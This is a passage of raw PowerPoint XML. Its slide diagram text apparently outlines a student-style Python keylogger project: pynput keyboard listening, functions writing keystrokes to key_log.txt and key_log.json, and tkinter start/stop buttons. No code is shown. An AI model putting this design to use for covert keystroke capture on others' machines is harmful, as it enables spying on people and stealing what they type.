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media/image12.jpg" ContentType="image/jpeg"/>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media/image19.jpg" ContentType="image/jpeg"/>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66" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="269"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3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ata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png"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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image" Target="../media/image10.jpeg"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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g"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpeg"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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g"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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image" Target="../media/image10.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g"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.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g"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing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51EF8-4AB8-4F89-9ED0-A30E002AB15C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1ECE98B-A54D-456B-B332-18ACAC20A694}" type="pres">
      <dgm:prSet presAssocID="{A3351EF8-4AB8-4F89-9ED0-A30E002AB15C}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0F969505-F008-4BEF-A5C9-011349A8C88F}" type="presOf" srcId="{A3351EF8-4AB8-4F89-9ED0-A30E002AB15C}" destId="{B1ECE98B-A54D-456B-B332-18ACAC20A694}"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16AB3A-F29B-455D-8CDE-DC97CC797479}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList4" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9022C681-6205-4E26-A256-9B885069542D}" type="pres">
      <dgm:prSet presAssocID="{9116AB3A-F29B-455D-8CDE-DC97CC797479}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A904772C-30B8-445D-BDA0-FD150B15F2D6}" type="presOf" srcId="{9116AB3A-F29B-455D-8CDE-DC97CC797479}" destId="{9022C681-6205-4E26-A256-9B885069542D}" srcOrd="0"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56A5724-F569-4E62-A06A-EF955228BDD4}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>1.Libraries and Modules:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{577B3413-77DB-415E-AB6B-734E46530B10}" type="parTrans" cxnId="{A0E66A9E-A04E-4967-97C1-0CAD21A4562E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E84F2386-1F83-4E57-9C2C-E3CE36BD4479}" type="sibTrans" cxnId="{A0E66A9E-A04E-4967-97C1-0CAD21A4562E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{804DC662-130D-4AE1-AAB3-0F4B5D0ADCB5}">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tkinter: Used to create the GUI.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEC2C06C-7EA7-4ED2-B7DF-05E047222A1D}" type="parTrans" cxnId="{E1076C3F-E86B-4379-B39E-EA83A2894ECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C60BFB9-3C6B-4451-8187-0C05CE9E5984}" type="sibTrans" cxnId="{E1076C3F-E86B-4379-B39E-EA83A2894ECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77F4209F-60C3-440F-82FF-77848E6E8F43}">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pynput.keyboard: Used to listen for keyboard events (key presses and releases).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2ED96B80-D087-4BCF-98BD-EE8CE3F8364C}" type="parTrans" cxnId="{41371403-D9B0-4591-856D-AABBE9BA055A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{581D0AEE-C230-484A-82BE-F5ACA14BD172}" type="sibTrans" cxnId="{41371403-D9B0-4591-856D-AABBE9BA055A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67B0FB01-62EF-4FD9-B14B-E14CA2382FBB}">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json: Used to save the logged keystrokes in JSON format.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEC9BB98-44E5-47E3-812E-21E060FAC203}" type="parTrans" cxnId="{07A360CE-BC66-4231-ACCC-48BE41E3ED7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C417A982-B059-475E-98D2-AB6ACE885E5C}" type="sibTrans" cxnId="{07A360CE-BC66-4231-ACCC-48BE41E3ED7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9F23B6E-7C17-4145-A821-79930E25D143}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>2.Variables:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E989BFE9-68E1-46CD-8EE7-655A131A166B}" type="parTrans" cxnId="{70E9AE14-57D2-495C-A864-F126EF67D0D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5093663E-91B2-454A-80A6-480A44D8FA51}" type="sibTrans" cxnId="{70E9AE14-57D2-495C-A864-F126EF67D0D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{302DF25B-E219-4A4C-A39D-90384B6FDA2E}">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keys_used: A list to store the keys along with their state (pressed, held, released).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE074C33-CE69-4A09-BDCF-27F545DB3986}" type="parTrans" cxnId="{935D68A3-EF3F-44B7-ABC0-65CCC7826BC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2511B955-4FCC-444E-8FC4-23F94FF2FF07}" type="sibTrans" cxnId="{935D68A3-EF3F-44B7-ABC0-65CCC7826BC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D4AA186-05A1-4866-B0ED-142015896F29}">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flag: A boolean flag to manage the state of key press and hold.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC51368B-BF43-41B7-9037-BEDE7231C620}" type="parTrans" cxnId="{5755FA56-300E-468A-A89D-153903345F87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC49A491-5FF9-44BF-9D06-117DFE9448E0}" type="sibTrans" cxnId="{5755FA56-300E-468A-A89D-153903345F87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CFD8401-B59D-47FC-9989-15C7164837BC}">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keys: A string to accumulate all keystrokes for logging in a text file.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{634E91D3-3C12-4F04-9061-85AC0A77DE36}" type="parTrans" cxnId="{F078B578-7E9C-4736-A5FB-F306E6AD63B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9B4835C-724D-4333-85C9-890F7D854EF7}" type="sibTrans" cxnId="{F078B578-7E9C-4736-A5FB-F306E6AD63B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>3.Functions:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F930608F-11C6-4C34-9CD6-990D03F6DD98}" type="parTrans" cxnId="{356961C2-BC1B-41DE-B00B-0039A73AB3E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{195074D7-3A28-4AA4-894C-4192196215C5}" type="sibTrans" cxnId="{356961C2-BC1B-41DE-B00B-0039A73AB3E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0853D6A-3306-46DE-B7C9-1180A457A93B}">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generate_text_log(key): Writes the accumulated keystrokes to a text file (key_log.txt).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52EACBBD-784F-4B11-9F88-991C3A9DCF15}" type="parTrans" cxnId="{288B7F1B-0ABF-4E34-A910-FD02905D5B95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB15D0BC-FEB7-420C-9E7E-47C49F463859}" type="sibTrans" cxnId="{288B7F1B-0ABF-4E34-A910-FD02905D5B95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96C7A794-D025-4708-BFEE-B22EE6916581}">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generate_json_file(keys_used): Writes the logged keystrokes to a JSON file (key_log.json).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8373BAC-5113-4257-A876-6724378C60FC}" type="parTrans" cxnId="{BE449E74-44DC-4AA8-A96F-3AFF58701E73}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97B66785-0404-48BA-9671-677A4B2D06D4}" type="sibTrans" cxnId="{BE449E74-44DC-4AA8-A96F-3AFF58701E73}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C46405F-DED1-4CFD-88E8-F95F9DE2C773}">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on_press(key): Handles key press events, updates the keys_used list, and calls generate_json_file.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9784BD4D-E298-450E-BFF6-F62E94165AFA}" type="parTrans" cxnId="{7A15FD3D-7BFF-4D1C-9422-11E75970515D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9580F0E-653A-4552-B829-4C1C487126C8}" type="sibTrans" cxnId="{7A15FD3D-7BFF-4D1C-9422-11E75970515D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E20B3316-6894-47BF-936D-4997158667A5}">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on_release(key): Handles key release events, updates the keys_used list, and calls both generate_json_file and generate_text_log.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F2FC64A-6F58-42FE-82A0-90D13045355E}" type="parTrans" cxnId="{E1496D23-6C20-4C1E-9F27-B21442C76197}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{708700DA-338A-4EA7-9717-2682A8A9CB23}" type="sibTrans" cxnId="{E1496D23-6C20-4C1E-9F27-B21442C76197}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11356B31-11A9-424A-BAF7-069033E05AA0}">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start_keylogger(): Initializes and starts the keylogger, updates the GUI to reflect the keylogger's running state.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C26AD57A-9F03-4769-A39C-E9E14AD45EA6}" type="parTrans" cxnId="{322D5572-72F4-4ACD-8F8F-BC431532276D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81932558-25BB-42BE-9038-EC2E092EBC0E}" type="sibTrans" cxnId="{322D5572-72F4-4ACD-8F8F-BC431532276D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{517F242F-192D-4867-A01A-BC6C343137C2}">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stop_keylogger(): Stops the keylogger and updates the GUI to reflect the keylogger's stopped state.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1854194-AE97-4837-929E-A1A26DCC384D}" type="parTrans" cxnId="{CAAA972B-25E9-4D78-9B5F-51F3459FD7BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A9FDE40-8E97-4BD6-8A89-9D3E5813BA7E}" type="sibTrans" cxnId="{CAAA972B-25E9-4D78-9B5F-51F3459FD7BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF3411F2-3672-4EB2-8883-6F7818E661EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>4.GUI Components:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C25E1997-9375-4858-8AE8-5FE6ADCDA3C1}" type="parTrans" cxnId="{A6FB7345-B8E7-4543-B929-E3D5C7B83D43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDF12DBE-6A84-41D5-A75F-705551FB2DE9}" type="sibTrans" cxnId="{A6FB7345-B8E7-4543-B929-E3D5C7B83D43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C68EAE3C-C847-4408-A85F-E5C9D50EF3AD}">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Label: Displays messages to the user about the keylogger’s state.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1B3FF3E-AB5D-4E6E-B23D-0F944C5968BB}" type="parTrans" cxnId="{D6674C46-716F-48BE-823F-4B780F67A536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79934C41-D003-4F2D-87BE-D4A0E52919BF}" type="sibTrans" cxnId="{D6674C46-716F-48BE-823F-4B780F67A536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15AA1C47-8ACE-4EBF-9906-3557E8BEE0A2}">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dirty="0"/>
            <a:t>Button: Two buttons to start and stop</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FBAA65D-479B-4925-896C-EB9B0BFFAC6C}" type="parTrans" cxnId="{2B30BCED-B201-4C10-8776-19B691DEC164}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD161485-0531-4E71-995D-36993D193525}" type="sibTrans" cxnId="{2B30BCED-B201-4C10-8776-19B691DEC164}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" type="pres">
      <dgm:prSet presAssocID="{556A5724-F569-4E62-A06A-EF955228BDD4}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C5DA448-1BC9-4EA9-AC39-81D2500B9823}" type="pres">
      <dgm:prSet presAssocID="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A76AC43-E4B8-4972-AF33-EFEA7466E88F}" type="pres">
      <dgm:prSet presAssocID="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}" type="pres">
      <dgm:prSet presAssocID="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE1FFBE5-6BC2-4333-A74F-FFD59BB01B5B}" type="pres">
      <dgm:prSet presAssocID="{E84F2386-1F83-4E57-9C2C-E3CE36BD4479}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB4B3F42-7207-46EA-A36B-C8FC80AA4B7D}" type="pres">
      <dgm:prSet presAssocID="{D9F23B6E-7C17-4145-A821-79930E25D143}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B06AF12-19C3-472D-B00C-49FAA7D775DF}" type="pres">
      <dgm:prSet presAssocID="{D9F23B6E-7C17-4145-A821-79930E25D143}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}" type="pres">
      <dgm:prSet presAssocID="{D9F23B6E-7C17-4145-A821-79930E25D143}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6804EE7C-D94E-4396-B6A8-DBABB7C7F5A3}" type="pres">
      <dgm:prSet presAssocID="{5093663E-91B2-454A-80A6-480A44D8FA51}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{745081C7-2CA3-47F0-94F6-71841B8EE2B9}" type="pres">
      <dgm:prSet presAssocID="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51BD275B-9670-4E3E-878A-95D00B8730CC}" type="pres">
      <dgm:prSet presAssocID="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" type="pres">
      <dgm:prSet presAssocID="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E5B62CB-FB11-40FF-B672-C5BE1AFD0E18}" type="pres">
      <dgm:prSet presAssocID="{195074D7-3A28-4AA4-894C-4192196215C5}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A22ACD91-3725-4FB7-8E9C-64ED57DDBD6F}" type="pres">
      <dgm:prSet presAssocID="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BC303FB-F10F-471F-81FA-439517E630C5}" type="pres">
      <dgm:prSet presAssocID="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F144BE0-EA0C-49B2-9259-D5CB43DC3579}" type="pres">
      <dgm:prSet presAssocID="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{41371403-D9B0-4591-856D-AABBE9BA055A}" srcId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" destId="{77F4209F-60C3-440F-82FF-77848E6E8F43}" srcOrd="1" destOrd="0" parTransId="{2ED96B80-D087-4BCF-98BD-EE8CE3F8364C}" sibTransId="{581D0AEE-C230-484A-82BE-F5ACA14BD172}"/>
    <dgm:cxn modelId="{D081BE0A-1F15-47BA-A075-F410135FFE15}" type="presOf" srcId="{556A5724-F569-4E62-A06A-EF955228BDD4}" destId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DD1D750E-5B46-44EB-A307-3DCB37F0DA2C}" type="presOf" srcId="{A0853D6A-3306-46DE-B7C9-1180A457A93B}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{6907C913-A3A2-454C-8815-8996BC3FC328}" type="presOf" srcId="{0CFD8401-B59D-47FC-9989-15C7164837BC}" destId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
